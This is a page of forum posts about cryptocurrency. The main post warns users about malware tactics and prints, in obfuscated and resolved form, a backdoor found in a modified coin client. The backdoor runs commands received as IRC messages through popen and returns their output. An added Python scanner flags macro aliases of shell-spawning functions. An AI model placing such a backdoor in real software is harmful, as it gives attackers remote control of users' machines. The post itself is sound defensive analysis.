Topics - taera249

Pages: 1 2 3 [4]
46
News / Beware of Increasingly Sophisticated Malware Infection Attempts
« on: January 24, 2018, 05:57:02 pm »
In the past months, malware infection attempts on this forum have become increasingly sophisticated. Below is a summary of infection techniques that I have encountered. With the most sophisticated attacks, common sense and virus scans are no longer sufficient to ensure safety.

"latest wallet"/"custom wallet"/"faster miner"
A newbie asks for the latest wallet, or wallet that doesn't have any tx fees, or the latest/fastest miner, and the attacker posts his in response. This type of attempt usually gets spotted pretty quickly.

Copied/new ANN
The attacker creates a new ANN topic and posts a malware link as the wallet (or a legit one and changes it to a malware one later).

Replacing links in quotes
The attacker quotes a legitimate post containing a download link written by the real developer (usually the OP or an update post) and changes the link within the quote to a malware link.

Compromised dev account
The developer account (usually responsible for making the OP) is compromised and a "mandatory update" is posted. This usually happens with old/abandoned coins so the real developer isn't there to notice the rogue update.

Packed/FUD executables
In most of the cases above, the malware has little to no detections on VirusTotal. This is because any script kiddie can pay $30 and have their malware crypted, rendering it fully undetectable.

Modified source with backdoor
This was recently brought to my attention via a user report. A newbie, under the guise of reviving a coin, posted a new client along with source. However, the source was modified to include a backdoor in the IRC bootstrapping mechanism.
Here is the relevant source code:
Code:

if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
{
   CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
   if (buf) {
      std::string result = "";
      while (!feof(buf))
         if (fgets(pszName, sizeof(pszName), buf) != NULL)
            result += pszName;
      CFree(buf);
      strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
      if (strchr(pszName, '!'))
         *strchr(pszName, '!') = '\0';
      Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str());
   }
}

Here is the source code with macros resolved:
Code:

if (vWords[1] == "PRIVMSG" && vWords[3] == ":!" && vWords[0].size() > 1)
{
   FILE *buf = popen(strstr(strLine.c_str(), vWords[4].c_str()), "r");
   if (buf) {
      std::string result = "";
      while (!feof(buf))
         if (fgets(pszName, sizeof(pszName), buf) != NULL)
            result += pszName;
      pclose(buf);
      strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
      if (strchr(pszName, '!'))
         *strchr(pszName, '!') = '\0';
      Send(hSocket, strprintf("%s %s :%s\r", "PRIVMSG", pszName, result.c_str()).c_str());
   }
}

The code was part of the initial commit, so it would be difficult to notice the addition of the code by casual inspection. Also, this would likely not show up on any virus scans.
   
It is pitch black. You are likely to be eaten by a grue.
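
A source-review check for the macro trick shown in the post above, as an added example that is not part of the original post: it resolves `#define` aliases and reports call sites whose macro expands to a process-spawning function such as `popen`. The `#define` lines in the sample are constructed (the post shows only the code before and after macro resolution), and the list of flagged functions is an assumption you should extend for your code base.

```python
import re

# Functions that start a shell or process; a call that reaches one of these
# through a macro alias deserves manual review. (Assumed list, extend as needed.)
DANGEROUS = {"popen", "_popen", "system", "execl", "execlp", "execv", "execvp",
             "CreateProcessA", "CreateProcessW", "ShellExecuteA", "WinExec"}

DEFINE_RE = re.compile(r"^[ \t]*#[ \t]*define[ \t]+(\w+)(.*)$", re.M)
IDENT_RE = re.compile(r"[A-Za-z_]\w*")
CALL_RE = re.compile(r"\b([A-Za-z_]\w*)\s*\(")

# Constructed sample: macro definitions (assumed) plus the call pattern from the post.
SAMPLE = '''\
#define CLine FILE
#define CRead popen
#define CFree pclose
#define CBuff "PRIVMSG"
if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
{
   CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
   if (buf) {
      CFree(buf);
   }
}
'''


def expand(name, macros, seen=None):
    """Return every identifier `name` can expand to, following macro chains."""
    seen = set() if seen is None else seen
    if name in seen or name not in macros:
        return {name}
    seen.add(name)  # guards against self-referential macros
    out = set()
    for tok in IDENT_RE.findall(macros[name]):
        out |= expand(tok, macros, seen)
    return out


def find_hidden_calls(source):
    """Return (line_no, name_as_written, real_function) for each risky call."""
    macros = {m.group(1): m.group(2) for m in DEFINE_RE.finditer(source)}
    findings = []
    for no, line in enumerate(source.splitlines(), 1):
        if DEFINE_RE.match(line):
            continue  # definitions are resolved above, not reported as calls
        for m in CALL_RE.finditer(line):
            for real in sorted(expand(m.group(1), macros) & DANGEROUS):
                findings.append((no, m.group(1), real))
    return findings
```

A finding where the name as written differs from the real function, such as `CRead` resolving to `popen`, is the case worth the closest look, because the alias is what hides the call from a plain text search.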

47
News / Alternative Block Chains : be safe!
« on: January 24, 2018, 05:54:56 pm »
I haven't seen anybody post about what would be my biggest worry if I were trying out alternative block chains. I realize this may be perceived as "Gavin is FUD'ding anything that isn't bitcoin!"  (FUD == Fear, Uncertainty and Doubt)  But I think some of you might be forgetting some basic computer security fundamentals in the excitement to be early adopters.

When I first heard about bitcoin, my questions were:

1) Can it possibly work (do the ideas for how it works make sense)?
2) Is it a scam?
3) If it is not a scam, could it open my computer up to viruses/trojans if I run it?

I answered those questions by:

1) Reading and understanding Satoshi's whitepaper.  Then thinking about it for a day or two and reading it again.
2) Finding out everything I could about the project.  I read every forum thread here (there were probably under a hundred threads back then) and read Satoshi's initial postings on the crypto mailing list.
3) Downloaded and skimmed the source code to see if it looked vulnerable to buffer overflow or other remotely exploitable attacks.

If I were going to experiment with an alternative block-chain, I'd go through the same process again. But I'm an old conservative fuddy-duddy.

If you want to take a risk on a brand-new alternative block-chain, I'd strongly suggest that you:

1) Run the software in a virtual machine or on a machine that doesn't contain anything valuable.
2) Don't invest more money or time than you can afford to lose.
3) Use a different passphrase at every exchange site.

48
How can a miner get mining in 2018? Prices are just too high

It would take 10 months just to make your money back. And then you start to see profit.



My 1 1070 can only pull in maybe $5 a day it would take me 7-8 months before I paid it back and made money...

Smart investment? How are people paying these prices?
